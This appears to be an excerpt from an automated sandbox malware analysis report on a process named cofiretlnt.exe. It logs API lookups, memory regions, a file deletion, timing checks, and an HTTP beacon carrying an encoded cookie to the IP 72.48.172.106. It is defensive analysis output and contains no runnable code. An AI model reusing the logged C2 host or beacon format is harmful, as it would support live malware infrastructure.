| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x758d7bbb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageA, address_out = 0x758d7bd3 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadIconA, address_out = 0x758ddafb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorA, address_out = 0x758ddad5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x758d7d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadImageA, address_out = 0x758e8455 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExA, address_out = 0x758ddb98 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExA, address_out = 0x758dd22e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ShowWindow, address_out = 0x758e0dfb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = UpdateWindow, address_out = 0x758e3559 |
|
1 |
System (262)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Ticks, time = 29889 |
|
43 | |
| Get Time | type = Ticks, time = 30030 |
|
1 | |
| Get Time | type = Ticks, time = 30045 |
|
87 | |
| Get Time | type = Ticks, time = 30061 |
|
66 | |
| Get Time | type = Ticks, time = 30482 |
|
26 | |
| Get Time | type = Ticks, time = 30498 |
|
26 | |
| Get Time | type = Ticks, time = 30529 |
|
9 | |
| Get Time | type = Ticks, time = 30919 |
|
4 |
Process #16: cofiretlnt.exe
931
4
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:46, Reason: Child Process |
| Unmonitor | End Time: 00:05:06, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5b8 |
| Parent PID | 0x530 (c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5BC
0x
6D0
0x
37C
0x
318
0x
5D0
0x
598
0x
594
0x
638
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00234fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002d7fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00318fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x00338fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00357fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| cofiretlnt.exe | 0x003a0000 | 0x003cbfff | Memory Mapped File | r |
|
|
|
|
| rsaenh.dll | 0x003a0000 | 0x003dbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x003a0000 | 0x003a0fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x003a0000 | 0x003abfff | Memory Mapped File | rw |
|
|
|
|
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x003c0000 | 0x003c7fff | Memory Mapped File | rw |
|
|
|
|
| index.dat | 0x003d0000 | 0x003dffff | Memory Mapped File | rw |
|
|
|
|
| index.dat | 0x003d0000 | 0x003dffff | Memory Mapped File | rw |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| cofiretlnt.exe | 0x00400000 | 0x0042dfff | Memory Mapped File | rwx |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00470fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x006aefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x0072ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000750000 | 0x00750000 | 0x008d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x00a60fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x01e6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001e70000 | 0x01e70000 | 0x02262fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x02270000 | 0x0253efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0267ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026b0000 | 0x026b0000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x028dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000026f0000 | 0x026f0000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028a0000 | 0x028a0000 | 0x028dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x029dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029e0000 | 0x029e0000 | 0x02adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002be0000 | 0x02be0000 | 0x02cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002da0000 | 0x02da0000 | 0x02daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002fa0000 | 0x02fa0000 | 0x02faffff | Private Memory | rw |
|
|
|
- |
| winspool.drv | 0x73550000 | 0x735a0fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x735b0000 | 0x735e1fff | Memory Mapped File | rwx |
|
|
|
- |
| msacm32.dll | 0x735f0000 | 0x73603fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x73730000 | 0x73742fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x73750000 | 0x737cffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x73970000 | 0x73977fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73980000 | 0x739dbfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x739e0000 | 0x73a1efff | Memory Mapped File | rwx |
|
|
|
- |
| pnrpnsp.dll | 0x74810000 | 0x74821fff | Memory Mapped File | rwx |
|
|
|
- |
| napinsp.dll | 0x74830000 | 0x7483ffff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x74840000 | 0x74847fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x74850000 | 0x7485dfff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x74860000 | 0x748b9fff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x748c0000 | 0x748c5fff | Memory Mapped File | rwx |
|
|
|
- |
| nlaapi.dll | 0x748d0000 | 0x748dffff | Memory Mapped File | rwx |
|
|
|
- |
| sensapi.dll | 0x748e0000 | 0x748e5fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x748f0000 | 0x748fcfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x74900000 | 0x74914fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x74920000 | 0x74971fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74980000 | 0x7499bfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x749a0000 | 0x749e3fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x749f0000 | 0x74a10fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74a20000 | 0x74bbdfff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74bd0000 | 0x74bd6fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74be0000 | 0x74c1afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74c20000 | 0x74c35fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74c40000 | 0x74c4cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x74c50000 | 0x74c5afff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74c60000 | 0x74c76fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74d90000 | 0x74d9bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74da0000 | 0x74dfffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74e00000 | 0x74e56fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x74e60000 | 0x74eeffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74ef0000 | 0x74f4ffff | Memory Mapped File | rwx |
|
|
|
- |
| normaliz.dll | 0x74f50000 | 0x74f52fff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x74f60000 | 0x75054fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x75070000 | 0x7520cfff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75210000 | 0x75254fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75260000 | 0x752fffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75300000 | 0x753abfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x753e0000 | 0x75462fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75500000 | 0x7550bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75510000 | 0x7561ffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x75650000 | 0x75659fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75660000 | 0x7572bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75730000 | 0x75775fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75780000 | 0x758b5fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x759c0000 | 0x75adcfff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75ae0000 | 0x75b7cfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75c00000 | 0x75c11fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75c20000 | 0x75c46fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75c50000 | 0x75c68fff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x75c70000 | 0x75ca4fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75cb0000 | 0x75d3efff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x75d40000 | 0x75f3afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75f40000 | 0x7602ffff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x76030000 | 0x7618bfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76190000 | 0x76dd9fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000076e40000 | 0x76e40000 | 0x76f5efff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000076f60000 | 0x76f60000 | 0x77059fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77060000 | 0x77208fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77210000 | 0x77215fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77240000 | 0x773bffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 5 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (41)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = file_type |
|
39 | |
| Get Info | - | type = size |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe | - |
|
1 |
Module (41)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ntdll.dll | base_address = 0x77240000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x74e60000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x75510000 |
|
1 | |
| Load | USER32.dll | base_address = 0x758c0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x75260000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x759c0000 |
|
1 | |
| Load | urlmon.dll | base_address = 0x75780000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe, size = 260 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x18fe2c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd80 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memcpy, address_out = 0x77262340 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetStockObject, address_out = 0x74e74eb8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x755211f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7552110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75521809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x755214e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7726e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7553eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x755214c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75521700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x75525929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x755c6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcA, address_out = 0x772824e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x758eae5f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x758d7809 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x758d7bbb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageA, address_out = 0x758d7bd3 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadIconA, address_out = 0x758ddafb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorA, address_out = 0x758ddad5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x758d7d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadImageA, address_out = 0x758e8455 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExA, address_out = 0x758ddb98 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExA, address_out = 0x758dd22e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ShowWindow, address_out = 0x758e0dfb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = UpdateWindow, address_out = 0x758e3559 |
|
1 | |
| Create Mapping | - | protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe, desired_access = FILE_MAP_READ |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
System (844)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 32245 |
|
17 | |
| Get Time | type = Ticks, time = 32261 |
|
92 | |
| Get Time | type = Ticks, time = 32276 |
|
92 | |
| Get Time | type = Ticks, time = 32292 |
|
48 | |
| Get Time | type = Ticks, time = 32307 |
|
1 | |
| Get Time | type = Ticks, time = 32323 |
|
12 | |
| Get Time | type = Ticks, time = 32339 |
|
71 | |
| Get Time | type = Ticks, time = 32354 |
|
60 | |
| Get Time | type = Ticks, time = 32463 |
|
3 | |
| Get Time | type = Ticks, time = 33477 |
|
1 | |
| Get Time | type = Ticks, time = 34491 |
|
2 | |
| Get Time | type = Ticks, time = 35505 |
|
1 | |
| Get Time | type = Ticks, time = 36519 |
|
1 | |
| Get Time | type = Ticks, time = 37533 |
|
2 | |
| Get Time | type = Ticks, time = 38547 |
|
54 | |
| Get Time | type = Ticks, time = 38563 |
|
84 | |
| Get Time | type = Ticks, time = 38579 |
|
56 | |
| Get Time | type = Ticks, time = 38719 |
|
2 | |
| Get Time | type = Ticks, time = 38735 |
|
3 | |
| Get Time | type = Ticks, time = 39561 |
|
1 | |
| Get Time | type = Ticks, time = 40575 |
|
2 | |
| Get Time | type = Ticks, time = 41589 |
|
1 | |
| Get Time | type = Ticks, time = 42635 |
|
1 | |
| Get Time | type = Ticks, time = 43649 |
|
1 | |
| Get Time | type = Ticks, time = 44663 |
|
86 | |
| Get Time | type = Ticks, time = 44678 |
|
112 | |
| Get Time | type = Ticks, time = 44803 |
|
3 | |
| Get Time | type = Ticks, time = 45677 |
|
1 | |
| Get Time | type = Ticks, time = 46691 |
|
1 | |
| Get Time | type = Ticks, time = 47705 |
|
1 | |
| Get Time | type = Ticks, time = 48719 |
|
2 | |
| Get Time | type = Ticks, time = 49733 |
|
1 | |
| Get Time | type = Ticks, time = 50747 |
|
17 | |
| Get Time | type = Ticks, time = 50762 |
|
8 | |
| Get Time | type = Ticks, time = 50918 |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Release | - |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 339 bytes |
| Total Data Received | 0 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | 72.48.172.106 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 72.48.172.106 |
| Server Port | 80 |
| Data Sent | 339 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 72.48.172.106, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 50762=oT4ucFk90L2GArqVpaaXct9GHR6H2HmMk0tHap9jKELCggzifyeYD4wlLFdeUcOBu82v87tPtfZEEyzi0Hr3QI+/pfUczbj8OwPDIl57EAxksSj6FT+HSnkKiF/c+lvxZj9gR3f1vl+yhqTabKyYZCuSfuiQhyeYxCOr+53KfnUI+ibyLcY48GNYRqHG1eI8klXCN1c7TWiA0mA7yqf0FSmIGQ8HHZ2URh7IbxnfpSi7LlQZpIBxxe7fLf782pXxJaNmW/rf8TI6sPGFdhKHf1F8YBPuHe15YudQxzu+rNRY2q5IWjB6+aNYatBaD7xud6q57q4tzWrgfYSF1RrfR3Lau+J/nvX26Kr04IT8otfafl9xe+H4nQaedrrZGCZNd4nKMKl1irLTNhlYr2ZLrDccA7E=, url = 72.48.172.106 |
|
1 |
